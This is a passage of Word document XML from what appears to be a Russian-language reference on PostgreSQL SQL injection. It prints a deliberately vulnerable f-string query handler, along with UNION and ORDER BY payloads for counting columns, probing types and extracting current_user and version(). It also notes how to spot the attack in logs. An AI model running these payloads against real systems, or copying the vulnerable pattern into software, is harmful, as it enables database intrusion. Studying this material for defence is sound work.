        <w:t>async def get_product(product_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1346A071" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1785CB5F"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02D7B775"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28A5C2F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35782A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вокруг f-string не даёт защиты — это просто текстовый SQL, склеенный из переменных. SQLAlchemy исполнит его как есть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FCC74"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 Ниже — два варианта с пошаговой постановкой и тем, что сервер видит после подстановки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40637F3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Техника 1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с инкрементом. Атакующий шлёт серию запросов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4415462A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 ORDER BY 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F318E86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 ORDER BY 2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B359FA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 ORDER BY 3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A453F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 ORDER BY 4--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F6698" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит, например, при четвёртом запросе:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F8D7E"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1 ORDER BY 4--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D33DE10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: ORDER BY position 4 is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — значит, в исходном SELECT 3 колонки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DAC3A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Техника 2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с инкрементом числа NULL-ов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0890040F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F85DA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CF3CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT NULL, NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D920B84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>При третьем варианте сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D08D16"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1 UNION SELECT NULL, NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C15F6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>и запрос отрабатывает успешно — арность совпала.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76E205" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий узнаёт число колонок, не получая данных. Это первый из двух подготовительных шагов — за ним следует определение типов (3.1.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC99264" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG-парсер проверяет арность UNION-аргументов на стадии анализа: ошибка приходит из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>transformSetOperationTree()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/parser/analyze.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по позиции проверяется allowed range — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валиден, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N ∈ [1, число_колонок]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, иначе сообщение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t>. Оба механизма реагируют до выполнения запроса, что делает их быстрыми и надёжными oracle-ами даже для медленных SELECT-ов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901BF21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. Никаких специальных привилегий. Достаточно уязвимого кода приложения и канала, по которому различимы успех и ошибка (HTTP-status, отличающийся response body, или видимая ошибка БД).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230DFC54"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ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нормальная SQL-конструкция, обозначает сортировку по N-й колонке select-list. Часто встречается в отчётах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A95E3DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT region, SUM(revenue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13530B06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM sales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA9D13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GROUP BY region</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C8CF13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 2 DESC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BCD867" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Само наличие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в логах ≠ инъекция. Признак атаки — последовательный инкремент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в коротком окне времени от одного клиента, плюс ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или в логе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6D2B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E9484" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1.2 (определение типов), 3.1.4 (извлечение метаданных), 3.2 (error-based — тот же error-канал используется иначе), 3.14.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по номеру колонки).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E46438" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL Documentation: Combining Queries; PortSwigger: SQL injection UNION attacks — determining the number of columns required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE59123" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1.2 Подгонка типов через `::text`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FDA88F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> После того как число колонок известно, нужно подобрать совместимые типы. PG требует, чтобы тип каждой колонки в обеих ветвях UNION приводился к общему типу. Универсальный способ — кастовать всё к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E383C4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тот же, что в 3.1.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6E6BAF"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 Здесь и далее в качестве примера — 3 колонки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D25C8E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Шаг 1 — поиск text-совместимой позиции, по очереди подменяя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'a'</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9925D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT 'a', NULL, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274CFCAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT NULL, 'a', NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86376A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT NULL, NULL, 'a'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B08AAAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Третий вариант, после подстановки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4688D8DC"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1 UNION SELECT NULL, NULL, 'a'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF44F4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Колонка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>price</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>numeric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text → numeric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не существует. Сервер вернёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION types numeric and text cannot be matched</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Аналогично — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>integer</w:t>
      </w:r>
      <w:r>
        <w:t>). А вторая позиция (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>) пройдёт без ошибки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599345F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Шаг 2 — extraction через text-совместимую колонку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF09E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT NULL, current_user::text, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B336A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id = 1 UNION SELECT NULL, version()::text, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D03D35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>После подстановки второй вариант:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC8E09C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
